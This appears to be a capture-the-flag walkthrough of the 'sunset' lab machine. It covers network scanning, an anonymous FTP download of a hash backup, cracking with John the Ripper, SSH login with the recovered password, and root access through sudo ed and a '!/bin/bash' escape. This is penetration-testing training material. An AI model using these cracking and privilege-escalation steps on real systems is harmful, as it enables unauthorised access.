Network Scanning
In the first step of scanning I used the “arp-scan -l” command to perform a Local Network Scan to find out the IP address of the targeted machine.
Command : arp-scan -l
After getting the target machine’s IP address I scanned the target for open port using Nmap.
Command : nmap -A -T4 -p- -oN nmap 192.168.0.175
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 22:59 IST
Nmap scan report for 192.168.0.175
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.0.175:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
| 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds
From scan result I found that ftp 21 port is open with Anonymous login enabled.
Enumeration / Reconnaissance
Let’s login with username : anonymous and any random password
Command : ftp 192.168.0.175
Here I found one backup file.
I transferred the backup file to my machine
Command : get backup
Now the backup file is transferred to my machine.
Password Cracking
The file contain the SHA512 ($6$) hashes So we can crack them using John The Ripper.
Command : john - -wordlist=/usr/share/wordlists/rockyou.txt
backup - -format=sha512crypt
Here I found the credentials : Username = sunset , Password : cheer14
As ssh port 22 was open so I used these credentials to login.
Command : ssh sunset@192.168.0.175
Wow!! Now I get a remote shell to this target box.
Now, I am a sunset user.
Command : ls
Privilege Escalation
Now I used the “sudo -l” which checks commands we can execute with sudo.
Command : sudo -l
Here I found “/usr/bin/ed” which is the binary.
Then I searched about ed Privilege Escalation found one article.
https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/
Then I searched about ed on GTFOBins and found the exploit there.
So, I executed “!/bin/bash” command and I was route to root 🙂